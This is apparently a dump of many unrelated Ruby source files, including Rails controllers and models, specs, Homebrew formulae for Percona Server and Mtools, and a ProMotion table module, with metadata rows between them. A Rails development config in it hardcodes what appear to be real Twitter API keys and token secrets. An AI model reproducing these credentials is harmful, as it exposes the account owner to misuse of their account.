personal_access_tokens.create!(id: 6, user_id: 1, name: 'pat-06', token: 'token-06')
end
it 'correctly schedules background migrations' do
Sidekiq::Testing.fake! do
migrate!
expect(described_class::MIGRATION).to(
be_scheduled_delayed_migration(
5.minutes, 'PersonalAccessToken', 'token', 'token_digest', 1, 5))
expect(described_class::MIGRATION).to(
be_scheduled_delayed_migration(
10.minutes, 'PersonalAccessToken', 'token', 'token_digest', 6, 6))
expect(BackgroundMigrationWorker.jobs.size).to eq 2
end
end
it 'schedules background migrations', :sidekiq_might_not_need_inline do
perform_enqueued_jobs do
plain_text_token = 'token IS NOT NULL'
expect(personal_access_tokens.where(plain_text_token).count).to eq 5
migrate!
expect(personal_access_tokens.where(plain_text_token).count).to eq 0
end
end
end
| 37.55102 | 105 | 0.713043 |
e81aa9c72042af7a65b26fb754ef211c4a9dcd5e | 177 | class Message < ApplicationRecord
belongs_to :user
belongs_to :room
validates_presence_of :content
validates_presence_of :user_id
validates_presence_of :room_id
end | 17.7 | 33 | 0.813559 |
ac2d9ca289b481af55a17af0d9192145f700547e | 134 | require "classnames/version"
require "classnames/classnames"
def Classnames(*classes)
Classnames::Classnames.new(classes).to_s
end
| 19.142857 | 42 | 0.80597 |
ed4d261781e70f72f2f8909722dc949a089d8386 | 1,553 | class Buyers::DeliveriesController < ApplicationController
after_action :verify_authorized
layout 'buyers'
def index
authorize(current_rfp, :edit?)
@deliveries = current_rfp.deliveries
end
def new
authorize(current_rfp, :edit?)
@delivery = current_rfp.deliveries.build
end
def edit
authorize(current_rfp, :edit?)
@delivery = current_rfp.deliveries.find(params[:id])
end
def create
authorize(current_rfp, :edit?)
@delivery = current_rfp.deliveries.build(delivery_params)
if @delivery.save
flash[:success] = 'Schedule was successfully created.'
redirect_to buyers_rfp_deliveries_path(current_rfp)
else
flash[:alert] = 'Schedule could not be saved.'
render :new
end
end
def update
authorize(current_rfp, :edit?)
@delivery = current_rfp.deliveries.find(params[:id])
if @delivery.update(delivery_params)
flash[:success] = 'Schedule was successfully saved.'
redirect_to buyers_rfp_deliveries_path(current_rfp)
else
flash[:alert] = 'Schedule could not be saved.'
render :edit
end
end
def destroy
authorize(current_rfp, :edit?)
schedule = current_rfp.deliveries.find(params[:id])
schedule.destroy
redirect_to buyers_rfp_deliveries_path(current_rfp)
end
private
def delivery_params
params.require(:delivery).permit(:location_id, :deliveries_per_week, :window_start_time, :window_end_time, delivery_days: [])
end
def current_rfp
@current_rfp ||= Rfp.find(params[:rfp_id])
end
end
| 25.459016 | 129 | 0.71217 |
28d655cd0597ce8158f268eb332081dec9d35c08 | 43 | module HideAndSeek
VERSION = "0.2.1"
end
| 10.75 | 19 | 0.697674 |
33a6ab959e570646e26ec5310f92b1da02b47894 | 1,967 | Rails.application.configure do
# Settings specified here will take precedence over those in config/application.rb.
# In the development environment your application's code is reloaded on
# every request. This slows down response time but is perfect for development
# since you don't have to restart the web server when you make code changes.
config.cache_classes = false
# Do not eager load code on boot.
config.eager_load = false
# Show full error reports and disable caching.
config.consider_all_requests_local = true
config.action_controller.perform_caching = false
# Don't care if the mailer can't send.
config.action_mailer.raise_delivery_errors = false
# Print deprecation notices to the Rails logger.
config.active_support.deprecation = :log
# Raise an error on page load if there are pending migrations.
config.active_record.migration_error = :page_load
# Debug mode disables concatenation and preprocessing of assets.
# This option may cause significant delays in view rendering with a large
# number of complex assets.
config.assets.debug = true
# Asset digests allow you to set far-future HTTP expiration dates on all assets,
# yet still be able to expire them through the digest params.
config.assets.digest = true
# Adds additional error checking when serving assets at runtime.
# Checks for improperly declared sprockets dependencies.
# Raises helpful error messages.
config.assets.raise_runtime_errors = true
# Raises error for missing translations
# config.action_view.raise_on_missing_translations = true
# use tweet bot
config.tweet_host = "localhost"
config.tweet_consumer_key = "zYrvDAVNm0QRfdGkOVXOh55MX"
config.tweet_consumer_secret = "Efttcdt6pdLeIw1X6hnbX5LrgVRDbc4y0SodePYeBE01DmLjw2"
config.tweet_access_token = "209984728-0heNNNwAcN4t8YrrNG5JoYsK4ujYpE7TIKDuZmCQ"
config.tweet_access_token_secret = "zHD8sx6TT5MyxHHEYT1axnRYDABhTC02GsS7FhofZyAHG"
end
| 40.142857 | 85 | 0.788002 |
6292e3e4182a886953d80ee11c365a83dd76afcb | 1,990 | module ProMotion
module Table
module Refreshable
def make_refreshable(params={})
pull_message = params[:pull_message] || "Pull to refresh"
@refreshing = params[:refreshing] || "Refreshing data..."
@updated_format = params[:updated_format] || "Last updated at %s"
@updated_time_format = params[:updated_time_format] || "%l:%M %p"
@refreshable_callback = params[:callback] || :on_refresh
@refresh_control = UIRefreshControl.alloc.init
@refresh_control.attributedTitle = NSAttributedString.alloc.initWithString(pull_message)
@refresh_control.addTarget(self, action:'refreshView:', forControlEvents:UIControlEventValueChanged)
self.refreshControl = @refresh_control
end
def start_refreshing
return unless @refresh_control
@refresh_control.beginRefreshing
# Scrolls the table down to show the refresh control when invoked programatically
tableView.setContentOffset(CGPointMake(0, tableView.contentOffset.y-@refresh_control.frame.size.height), animated:true) if tableView.contentOffset.y > -65.0
end
alias :begin_refreshing :start_refreshing
def end_refreshing
return unless @refresh_control
@refresh_control.attributedTitle = NSAttributedString.alloc.initWithString(sprintf(@updated_format, Time.now.strftime(@updated_time_format)))
@refresh_control.endRefreshing
end
alias :stop_refreshing :end_refreshing
######### iOS methods, headless camel case #######
# UIRefreshControl Delegates
def refreshView(refresh)
refresh.attributedTitle = NSAttributedString.alloc.initWithString(@refreshing)
if @refreshable_callback && self.respond_to?(@refreshable_callback)
self.send(@refreshable_callback)
else
mp "You must implement the '#{@refreshable_callback}' method in your TableScreen.", force_color: :yellow
end
end
end
end
end
| 39.8 | 164 | 0.705025 |
d59f6fda31dba4da327135a67fa8872f84897e6c | 5,512 | class PerconaServerAT55 < Formula
desc "Drop-in MySQL replacement"
homepage "https://www.percona.com/"
url "https://www.percona.com/downloads/Percona-Server-5.5/Percona-Server-5.5.57-38.9/source/tarball/percona-server-5.5.57-38.9.tar.gz"
version "5.5.57-38.9"
sha256 "253f5c254b038c0622055dc8f0259a517be58736cfdb2eefebcba028a8c58da4"
bottle do
rebuild 1
sha256 "fbe85feed350b63a74bd0271ba97873ecd60a1e79c8d1dac1b3a2708e49d52c3" => :high_sierra
sha256 "6e983264db4df69a954d7232e908bbc7bd283d058a8831b9c9fe4f907f55e417" => :sierra
sha256 "0f6b7b056117903982a979fd68c0a1a74279dac6fe941d27d1d217ad2ebfdc8a" => :el_capitan
sha256 "5a4743c33b2e5fc3546b82cb267f60ca35b16eb20b5635df468a470c2fa90999" => :yosemite
end
keg_only :versioned_formula
option "with-test", "Build with unit tests"
option "with-embedded", "Build the embedded server"
option "with-libedit", "Compile with editline wrapper instead of readline"
option "with-local-infile", "Build with local infile loading support"
deprecated_option "enable-local-infile" => "with-local-infile"
deprecated_option "with-tests" => "with-test"
depends_on "cmake" => :build
depends_on "readline"
depends_on "pidof"
depends_on "openssl"
# Where the database files should be located. Existing installs have them
# under var/percona, but going forward they will be under var/mysql to be
# shared with the mysql and mariadb formulae.
def datadir
@datadir ||= (var/"percona").directory? ? var/"percona" : var/"mysql"
end
pour_bottle? do
reason "The bottle needs a var/mysql datadir (yours is var/percona)."
satisfy { datadir == var/"mysql" }
end
def install
args = std_cmake_args + %W[
-DMYSQL_DATADIR=#{datadir}
-DINSTALL_PLUGINDIR=lib/plugin
-DSYSCONFDIR=#{etc}
-DINSTALL_MANDIR=#{man}
-DINSTALL_DOCDIR=#{doc}
-DINSTALL_INFODIR=#{info}
-DINSTALL_INCLUDEDIR=include/mysql
-DINSTALL_MYSQLSHAREDIR=#{share.basename}/mysql
-DWITH_SSL=yes
-DDEFAULT_CHARSET=utf8
-DDEFAULT_COLLATION=utf8_general_ci
-DCOMPILATION_COMMENT=Homebrew
-DWITH_EDITLINE=system
]
# PAM plugin is Linux-only at the moment
args.concat %w[
-DWITHOUT_AUTH_PAM=1
-DWITHOUT_AUTH_PAM_COMPAT=1
-DWITHOUT_DIALOG=1
]
# To enable unit testing at build, we need to download the unit testing suite
if build.with? "tests"
args << "-DENABLE_DOWNLOADS=ON"
else
args << "-DWITH_UNIT_TESTS=OFF"
end
# Build the embedded server
args << "-DWITH_EMBEDDED_SERVER=ON" if build.with? "embedded"
# Compile with readline unless libedit is explicitly chosen
args << "-DWITH_READLINE=yes" if build.without? "libedit"
# Build with local infile loading support
args << "-DENABLED_LOCAL_INFILE=1" if build.include? "enable-local-infile"
system "cmake", *args
system "make"
system "make", "install"
# Don't create databases inside of the prefix!
# See: https://github.com/mxcl/homebrew/issues/4975
rm_rf prefix+"data"
# Link the setup script into bin
ln_s prefix+"scripts/mysql_install_db", bin+"mysql_install_db"
# Fix up the control script and link into bin
inreplace "#{prefix}/support-files/mysql.server",
/^(PATH=".*)(")/, "\\1:#{HOMEBREW_PREFIX}/bin\\2"
ln_s "#{prefix}/support-files/mysql.server", bin
# Move mysqlaccess to libexec
libexec.mkpath
mv "#{bin}/mysqlaccess", libexec
mv "#{bin}/mysqlaccess.conf", libexec
# Install my.cnf that binds to 127.0.0.1 by default
(buildpath/"my.cnf").write <<-EOS.undent
# Default Homebrew MySQL server config
[mysqld]
# Only allow connections from localhost
bind-address = 127.0.0.1
EOS
etc.install "my.cnf"
end
def caveats; <<-EOS.undent
Set up databases to run AS YOUR USER ACCOUNT with:
unset TMPDIR
mysql_install_db --verbose --user=`whoami` --basedir="$(brew --prefix percona-server55)" --datadir=#{datadir} --tmpdir=/tmp
To set up base tables in another folder, or use a different user to run
mysqld, view the help for mysqld_install_db:
mysql_install_db --help
and view the MySQL documentation:
* https://dev.mysql.com/doc/refman/5.5/en/mysql-install-db.html
* https://dev.mysql.com/doc/refman/5.5/en/default-privileges.html
To run as, for instance, user "mysql", you may need to `sudo`:
sudo mysql_install_db ...options...
A "/etc/my.cnf" from another install may interfere with a Homebrew-built
server starting up correctly.
MySQL is configured to only allow connections from localhost by default
To connect:
mysql -uroot
EOS
end
plist_options :manual => "mysql.server start"
def plist; <<-EOS.undent
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>KeepAlive</key>
<true/>
<key>Label</key>
<string>#{plist_name}</string>
<key>Program</key>
<string>#{opt_prefix}/bin/mysqld_safe</string>
<key>RunAtLoad</key>
<true/>
<key>WorkingDirectory</key>
<string>#{var}</string>
</dict>
</plist>
EOS
end
test do
system "/bin/sh", "-n", "#{bin}/mysqld_safe"
(prefix/"mysql-test").cd do
system "./mysql-test-run.pl", "status", "--vardir=#{testpath}"
end
end
end
| 32.423529 | 136 | 0.681422 |
e83d94d1a087b33069060e40c1fd620509da7c23 | 474 | module Bane
module Behaviors
module Responders
# Accepts a connection, pauses a fixed duration, then closes the connection.
#
# Options:
# - duration: The number of seconds to wait before disconnect. Default: 30
class CloseAfterPause
def initialize(options = {})
@options = {duration: 30}.merge(options)
end
def serve(io)
sleep(@options[:duration])
end
end
end
end
end | 22.571429 | 83 | 0.597046 |
1c857a6e09dfb8db94ac1970f09bfa414454c3fb | 1,075 | module Admin
class BaseController < ApplicationController
layout 'admin'
before_action :only_admin_or_moderator
def make_admin
@info = Info.find_by_id(params[:id])
@user = User.find(@info.user_id)
@user.update_attributes(role: 'admin', admin: 'true')
@user.save
redirect_to '/admin/admins'
end
def ban_the_user
@infos = Info.all
@info = Info.find_by_id(params[:id])
if @info.ban == false
@info.update_attribute(:ban, true)
@info.save
else
@info.update_attribute(:ban, false)
@info.save
end
redirect_to '/admin/admins'
end
def delete_user
@info = Info.find_by_id(params[:id])
@user = User.find(@info.user_id)
@user.destroy
respond_to do |format|
format.html { redirect_to '/admin/admins', notice: 'User was successfully destroyed.' }
end
end
private
def only_admin_or_moderator
if current_user.admin == true
true
else
redirect_to root_path
end
end
end
end
| 22.87234 | 96 | 0.615814 |
0196ddc1e2bef6eea1ce41f030c64efd9b9f344e | 385 | # frozen_string_literal: true
module Api
module Exceptions
class AuthenticationError < StandardError; end
class LocationNotFound < StandardError; end
class UnauthorizedError < AuthenticationError; end
class InvalidTokenError < AuthenticationError; end
class ExpiredTokenError < AuthenticationError; end
class InvalidParameters < StandardError; end
end
end
| 29.615385 | 54 | 0.787013 |
3815c26ddd328e090529a5b0561c2e271fa33413 | 1,341 | # DocumentCollection sync checks are throwing up some errors as follow:
# "documents shouldn't contain 'uuid'"
# Searching for these documents by uuid reveals a document in a strange state:
# The document will have only 1 edition and that edition state will be superseded
#
# To fix this we are going to manually set the state to `published` and then
# send them throuh the EditionUnpublisher to unpublish them with a PublishedInError
# id and reason. We have to first set the state to `published` because Edition
# workflow only allows certain state transitions.
#
# We also send them through the PublishingApi to resync data in the content store
content_ids = %w[5f5299be-7631-11e4-a3cb-005056011aef 5d8ff850-7631-11e4-a3cb-005056011aef]
documents = Document.where(content_id: content_ids)
documents.each do |document|
first_edition = document.editions.first
first_edition.state = "published"
first_edition.save!
unpublisher = EditionUnpublisher.new(
first_edition,
unpublishing: { unpublishing_reason_id: UnpublishingReason::PublishedInError.id, explanation: "Published in error" },
)
puts "about to unpublish #{document.content_id}"
unpublisher.perform!
puts "unpublished in Whitehall"
puts "republishing to publishing api"
PublishingApiDocumentRepublishingWorker.new.perform(document.id)
puts "done"
end
| 43.258065 | 121 | 0.788218 |
03054f5e96f3e32062ac6d656448edac8d21938a | 1,299 | # frozen_string_literal: true
class Reports::MonthlyProgressComponent < ViewComponent::Base
include AssetsHelper
include DashboardHelper
attr_reader :dimension
attr_reader :range
attr_reader :monthly_counts
attr_reader :total_counts
def initialize(dimension, service:)
@dimension = dimension
@monthly_counts = service.monthly_counts
@total_counts = service.total_counts
@region = service.region
@range = service.range.reverse_each
end
def diagnosis_group_class
classes = []
classes << dimension.diagnosis unless dimension.diagnosis == :all
classes << dimension.gender
classes.compact.join(":")
end
def display?
dimension.diagnosis == :all && dimension.gender == :all
end
def table(&block)
options = {class: ["progress-table", dimension.indicator, diagnosis_group_class]}
if !display?
options[:style] = "display:none"
end
tag.table(options, &block)
end
# The default diagnosis is the one we display at the top level on initial page load
def default_diagnosis
:all
end
def total_count
@total_counts.attributes[dimension.field]
end
def monthly_count(period)
counts = monthly_counts[period]
if counts
counts.attributes[dimension.field]
else
0
end
end
end
| 23.196429 | 85 | 0.712086 |
f7dcf1761cc5399cc4ce337624f4f365ef2ae168 | 143 | class AddSitemapStateToGnavMenuItems < ActiveRecord::Migration
def change
add_column :gnav_menu_items, :sitemap_state, :string
end
end
| 23.833333 | 62 | 0.804196 |
2192aa92668927c5c611b4b957236d8043903674 | 1,508 | #
# Be sure to run `pod spec lint ByteBackpacker.podspec' to ensure this is a
# valid spec and to remove all comments including this before submitting the spec.
#
# To learn more about Podspec attributes see http://docs.cocoapods.org/specification.html
# To see working Podspecs in the CocoaPods repo see https://github.com/CocoaPods/Specs/
#
Pod::Spec.new do |s|
s.name = "ByteBackpacker"
s.version = "1.2.2"
s.summary = "ByteBackpacker is a small utility written in pure Swift to pack value types into a Byte array and unpack them back."
s.description = <<-DESC
ByteBackpacker is a small utility written in pure Swift to pack value types into a Byte array and unpack them back. Additionally, there is a Data (formerly NSData) extension to convert Data objects into a Byte array. Byte is a typealias for UInt8.
DESC
s.homepage = "https://github.com/michaeldorner/ByteBackpacker"
s.license = { :type => "MIT", :file => "LICENSE" }
s.author = { "Michael Dorner" => "[email protected]" }
s.source = { :git => "https://github.com/michaeldorner/ByteBackpacker.git", :tag => s.version.to_s }
s.ios.deployment_target = "13.1"
s.osx.deployment_target = "10.15"
s.watchos.deployment_target = "6.0"
s.tvos.deployment_target = "13.1"
s.swift_version = '5.0'
s.requires_arc = true
s.source_files = "Sources/ByteBackpacker.swift"
#s.public_header_files = "Sources/ByteBackpacker.h"
end
| 45.69697 | 265 | 0.685013 |
6ac3dc25c3ee8a450e526a11c7cc1f642babf5b2 | 2,107 | class Mtools < Formula
desc "Tools for manipulating MSDOS files"
homepage "https://www.gnu.org/software/mtools/"
url "https://ftp.gnu.org/gnu/mtools/mtools-4.0.37.tar.gz"
mirror "https://ftpmirror.gnu.org/mtools/mtools-4.0.37.tar.gz"
sha256 "426dc3d15017aae8daf68c9119c0f5f2eafb30deb4a4b417d7d763c4ab728c7b"
license "GPL-3.0-or-later"
bottle do
sha256 cellar: :any_skip_relocation, arm64_monterey: "d352b9c8e8b73a9edf872160a1d66c8db95a39906663515c19841911a1a1459c"
sha256 cellar: :any_skip_relocation, arm64_big_sur: "5cdb00e80178db05baa29f038582d877ee2cf520106cd6fa40e37231ca59281f"
sha256 cellar: :any_skip_relocation, monterey: "6b2d36cecaf5a14e3d0aa9279a8717b5c282e0a2751dc6a1faf6a0995e7281d8"
sha256 cellar: :any_skip_relocation, big_sur: "eb20c7441d189658e48ee3aa63d7b24b578c3e4a01bd9613978a56933fed809e"
sha256 cellar: :any_skip_relocation, catalina: "7b0439da4380a0eb89e55fb8146cfc6381ab7acdd291ee247180b361f87de374"
sha256 cellar: :any_skip_relocation, x86_64_linux: "f7d94d7689040334732d7640cdaf37f7076caeb7bff7f78f6050aaba8ab55cf5"
end
conflicts_with "multimarkdown", because: "both install `mmd` binaries"
# 4.0.25 doesn't include the proper osx locale headers.
patch :DATA
def install
args = %W[
--disable-debug
--prefix=#{prefix}
--sysconfdir=#{etc}
--without-x
]
args << "LIBS=-liconv" if OS.mac?
# The mtools configure script incorrectly detects stat64. This forces it off
# to fix build errors on Apple Silicon. See stat(6) and pv.rb.
ENV["ac_cv_func_stat64"] = "no" if Hardware::CPU.arm?
system "./configure", *args
system "make"
ENV.deparallelize
system "make", "install"
end
test do
assert_match version.to_s, shell_output("#{bin}/mtools --version")
end
end
__END__
diff --git a/sysincludes.h b/sysincludes.h
index 056218e..ba3677b 100644
--- a/sysincludes.h
+++ b/sysincludes.h
@@ -279,6 +279,8 @@ extern int errno;
#include <pwd.h>
#endif
+#include <xlocale.h>
+#include <strings.h>
#ifdef HAVE_STRING_H
# include <string.h>
| 34.540984 | 123 | 0.740864 |
f8783a647a9463ebe0750ecf71f361523e6bc1b5 | 6,279 | #-- copyright
# OpenProject is a project management system.
# Copyright (C) 2012-2018 the OpenProject Foundation (OPF)
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License version 3.
#
# OpenProject is a fork of ChiliProject, which is a fork of Redmine. The copyright follows:
# Copyright (C) 2006-2017 Jean-Philippe Lang
# Copyright (C) 2010-2013 the ChiliProject Team
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
#
# See docs/COPYRIGHT.rdoc for more details.
#++
require 'spec_helper'
require 'rack/test'
describe 'API v3 Render resource', type: :request do
include Rack::Test::Methods
include API::V3::Utilities::PathHelper
let(:project) { FactoryGirl.create(:project, is_public: false) }
let(:work_package) { FactoryGirl.create(:work_package, project: project) }
let(:user) { FactoryGirl.create(:user, member_in_project: project) }
let(:content_type) { 'text/plain, charset=UTF-8' }
let(:path) { api_v3_paths.render_markup format: format, link: context }
let(:format) { nil }
let(:context) { nil }
before(:each) do
login_as(user)
post path, params, 'CONTENT_TYPE' => content_type
end
shared_examples_for 'valid response' do
it { expect(subject.status).to eq(200) }
it { expect(subject.content_type).to eq('text/html') }
it { expect(subject.body).to be_html_eql(text) }
end
describe 'textile' do
let(:format) { 'textile' }
describe '#post' do
subject(:response) { last_response }
describe 'response' do
describe 'valid' do
context 'w/o context' do
let(:params) do
'Hello World! This *is* textile with a ' +
'"link":http://community.openproject.org and ümläutß.'
end
it_behaves_like 'valid response' do
let(:text) do
'<p>Hello World! This <strong>is</strong> textile with a ' +
'<a href="http://community.openproject.org" class="external">link</a> ' +
'and ümläutß.</p>'
end
end
end
context 'with context' do
let(:params) { "Hello World! Have a look at ##{work_package.id}" }
let(:id) { work_package.id }
let(:href) { "/work_packages/#{id}" }
let(:title) { "#{work_package.subject} (#{work_package.status})" }
let(:text) {
'<p>Hello World! Have a look at <a '\
"class=\"issue work_package status-1 priority-1\" "\
"href=\"#{href}\" "\
"title=\"#{title}\">##{id}</a></p>"
}
context 'with work package context' do
let(:context) { api_v3_paths.work_package work_package.id }
it_behaves_like 'valid response'
end
context 'with project context' do
let(:context) { "/api/v3/projects/#{work_package.project_id}" }
it_behaves_like 'valid response'
end
end
end
describe 'invalid' do
context 'content type' do
let(:content_type) { 'application/json' }
let(:params) {
{ 'text' => "Hello World! Have a look at ##{work_package.id}" }.to_json
}
it_behaves_like 'unsupported content type',
I18n.t('api_v3.errors.invalid_content_type',
content_type: 'text/plain',
actual: 'application/json')
end
context 'with context' do
let(:params) { '' }
describe 'work package does not exist' do
let(:context) { api_v3_paths.work_package -1 }
it_behaves_like 'invalid render context',
I18n.t('api_v3.errors.render.context_object_not_found')
end
describe 'work package not visible' do
let(:invisible_work_package) { FactoryGirl.create(:work_package) }
let(:context) { api_v3_paths.work_package invisible_work_package.id }
it_behaves_like 'invalid render context',
I18n.t('api_v3.errors.render.context_object_not_found')
end
describe 'context does not exist' do
let(:context) { api_v3_paths.root }
it_behaves_like 'invalid render context',
I18n.t('api_v3.errors.render.context_not_parsable')
end
describe 'unsupported context resource found' do
let(:context) { api_v3_paths.activity 2 }
it_behaves_like 'invalid render context',
I18n.t('api_v3.errors.render.unsupported_context')
end
describe 'unsupported context version found' do
let(:context) { '/api/v4/work_packages/2' }
it_behaves_like 'invalid render context',
I18n.t('api_v3.errors.render.unsupported_context')
end
end
end
end
end
end
describe 'plain' do
describe '#post' do
let(:format) { 'plain' }
subject(:response) { last_response }
describe 'response' do
describe 'valid' do
let(:params) { "Hello *World*! Have a look at #1\n\nwith two lines." }
it_behaves_like 'valid response' do
let(:text) { "<p>Hello *World*! Have a look at #1</p>\n\n<p>with two lines.</p>" }
end
end
end
end
end
end
| 34.690608 | 94 | 0.587195 |
91019e888715ed5f8012fd3989a9559141d9fd8d | 380 | # typed: false
require "shared_examples_for_opcode"
RSpec.describe(AVR::Opcode) do
describe "elpm" do
include_examples "opcode", :elpm
it "is not implemented" do
expect do
cpu.instruction(:elpm, cpu.r0, AVR::RegisterWithModification.new(cpu.Z, :post_increment)).execute
end.to(raise_error(AVR::Opcode::OpcodeNotImplementedError))
end
end
end
| 25.333333 | 105 | 0.715789 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.